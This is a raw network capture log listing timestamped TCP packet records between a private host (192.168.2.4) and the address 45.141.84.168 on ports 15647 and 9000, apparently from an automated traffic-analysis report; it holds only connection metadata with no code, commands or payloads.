                                          Nov 28, 2024 13:39:19.156981945 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:19.157075882 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:19.195760012 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:19.195811033 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:19.315872908 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:19.315922022 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:19.357897043 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:19.406588078 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:19.435997009 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:19.436042070 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:19.517184019 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:19.517251015 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:19.556051970 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:19.637207985 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:19.637274981 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:19.639713049 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:19.757322073 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:19.757369995 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:19.757432938 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:19.812828064 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:19.926749945 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:19.926800966 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:19.958698034 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:20.000346899 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:20.046871901 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:20.053700924 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:20.080574036 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:20.125336885 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:20.200962067 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:20.201111078 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:20.249066114 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:20.297257900 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:20.312387943 CET90004973945.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:20.312524080 CET90004973945.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:20.312721014 CET497399000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:20.312947035 CET497399000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:20.363787889 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:20.364471912 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:20.376835108 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:20.422224998 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:20.423733950 CET497419000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:20.437915087 CET90004973945.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:20.487288952 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:20.487437010 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:20.523382902 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:20.545191050 CET90004974145.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:20.545546055 CET497419000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:20.545741081 CET497419000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:20.578469038 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:20.607738972 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:20.607877016 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:20.665658951 CET90004974145.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:20.687532902 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:20.727827072 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:20.727897882 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:20.808897018 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:20.851810932 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:20.851948977 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:20.929168940 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:20.929251909 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:20.974168062 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:21.052503109 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:21.052654028 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:21.052969933 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:21.094094992 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:21.175385952 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:21.175460100 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:21.346704006 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:21.346765041 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:21.375999928 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:21.376074076 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:21.467036963 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:21.496081114 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:21.496157885 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:21.499995947 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:21.547210932 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:21.615986109 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:21.616086006 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:21.666778088 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:21.668190002 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:21.719090939 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:21.736027002 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:21.736085892 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:21.817497015 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:21.817578077 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:21.856436014 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:21.902472019 CET90004974145.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:21.902569056 CET90004974145.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:21.902667046 CET497419000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:21.902690887 CET497419000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:21.937423944 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:21.937516928 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:21.937601089 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:22.016644001 CET497439000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:22.018606901 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:22.018693924 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:22.022819996 CET90004974145.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:22.057585001 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:22.136591911 CET90004974345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:22.136672974 CET497439000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:22.136858940 CET497439000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:22.138484955 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:22.138557911 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:22.138989925 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:22.256714106 CET90004974345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:22.258501053 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:22.258584023 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:22.259346962 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:22.312865973 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:22.422791958 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:22.422863007 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:22.459928036 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:22.460087061 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:22.503931046 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:22.542829990 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:22.547250032 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:22.580055952 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:22.580137968 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:22.582855940 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:22.625339985 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:22.704974890 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:22.708297968 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:22.886730909 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:22.886812925 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:22.905193090 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:22.905289888 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:23.007688046 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:23.009799957 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:23.025490999 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:23.030491114 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:23.078465939 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:23.125655890 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:23.125768900 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:23.178783894 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:23.231684923 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:23.231831074 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:23.246548891 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:23.352788925 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:23.352919102 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:23.447820902 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:23.447935104 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:23.473963022 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:23.522574902 CET90004974345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:23.522640944 CET90004974345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:23.522706032 CET497439000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:23.522854090 CET497439000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:23.554166079 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:23.554263115 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:23.568869114 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:23.626164913 CET497449000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:23.642756939 CET90004974345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:23.674305916 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:23.674356937 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:23.675158978 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:23.719093084 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:23.746691942 CET90004974445.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:23.746754885 CET497449000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:23.746901035 CET497449000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:23.770319939 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:23.770390034 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:23.838824987 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:23.870640039 CET90004974445.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:23.875538111 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:23.893017054 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:23.893064022 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:23.923902035 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:23.969249010 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:24.058705091 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:24.058803082 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:24.094441891 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:24.095802069 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:24.167874098 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:24.178781033 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:24.215986013 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:24.216059923 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:24.295809031 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:24.336397886 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:24.336587906 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:24.380085945 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:24.422415018 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:24.514689922 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:24.514748096 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:24.537935019 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:24.538058043 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:24.623924017 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:24.634911060 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:24.662473917 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:24.662525892 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:24.738821030 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:24.781753063 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:24.782488108 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:24.782555103 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:24.863656998 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:24.863766909 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:24.902479887 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:24.983741999 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:24.984215975 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:25.103744030 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:25.103816986 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:25.150696993 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:25.153930902 CET90004974445.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:25.154048920 CET90004974445.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:25.154117107 CET497449000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:25.154149055 CET497449000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:25.185079098 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:25.185173035 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:25.223845005 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:25.223922014 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:25.266547918 CET497479000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:25.274281025 CET90004974445.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:25.305702925 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:25.305792093 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:25.344961882 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:25.386543989 CET90004974745.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:25.386641979 CET497479000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:25.386769056 CET497479000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:25.425223112 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:25.425309896 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:25.425765038 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:25.512259007 CET90004974745.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:25.545394897 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:25.545531988 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:25.549062014 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:25.665649891 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:25.665704012 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:25.750350952 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:25.750432968 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:25.785960913 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:25.866980076 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:25.867088079 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:25.870762110 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:25.987262964 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:25.987330914 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:25.987425089 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:26.031600952 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:26.150974989 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:26.151063919 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:26.188787937 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:26.189770937 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:26.271537066 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:26.308758974 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:26.309761047 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:26.366707087 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:26.431929111 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:26.432145119 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:26.432241917 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:26.472371101 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:26.515969992 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:26.552386045 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:26.557733059 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:26.633544922 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:26.635864973 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:26.677838087 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:26.720040083 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:26.720108032 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:26.748826027 CET90004974745.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:26.749083042 CET497479000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:26.749094963 CET90004974745.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:26.749142885 CET497479000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:26.755829096 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:26.835360050 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:26.835498095 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:26.840056896 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:26.863660097 CET497499000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:26.869359970 CET90004974745.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:26.955408096 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:26.955517054 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:26.957005978 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:26.983705997 CET90004974945.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:26.984812021 CET497499000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:26.985049963 CET497499000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:27.000341892 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:27.105144978 CET90004974945.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:27.118963957 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:27.119066000 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:27.156786919 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:27.203496933 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:27.204298019 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:27.204375029 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:27.239206076 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:27.276807070 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:27.277035952 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:27.366667032 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:27.396949053 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:27.404022932 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:27.405464888 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:27.453470945 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:27.570800066 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:27.570872068 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:27.598589897 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:27.640974045 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:27.690834045 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:27.690879107 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:27.725297928 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:27.765959024 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:27.799612045 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:27.799675941 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:27.858652115 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:27.920564890 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:27.920623064 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:27.926565886 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:27.969109058 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:28.012257099 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:28.012343884 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:28.082628965 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:28.132518053 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:28.132580996 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:28.167913914 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:28.219131947 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:28.242918015 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:28.242989063 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:28.294737101 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:28.345654964 CET90004974945.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:28.345755100 CET90004974945.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:28.345825911 CET497499000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:28.345911980 CET497499000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:28.364270926 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:28.364357948 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:28.411906004 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:28.453473091 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:28.453947067 CET497509000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:28.465858936 CET90004974945.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:28.484442949 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:28.484603882 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:28.565897942 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:28.566031933 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:28.573868036 CET90004975045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:28.573992014 CET497509000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:28.574126005 CET497509000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:28.604928970 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:28.663275003 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:28.663382053 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:28.686127901 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:28.694036007 CET90004975045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:28.767045021 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:28.783633947 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:28.783687115 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:28.864362955 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:28.903666019 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:28.903744936 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:28.985021114 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:29.023895025 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:29.023988962 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:29.105082989 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:29.105178118 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:29.144828081 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:29.225119114 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:29.225219011 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:29.226111889 CET156474973045.141.84.168192.168.2.4
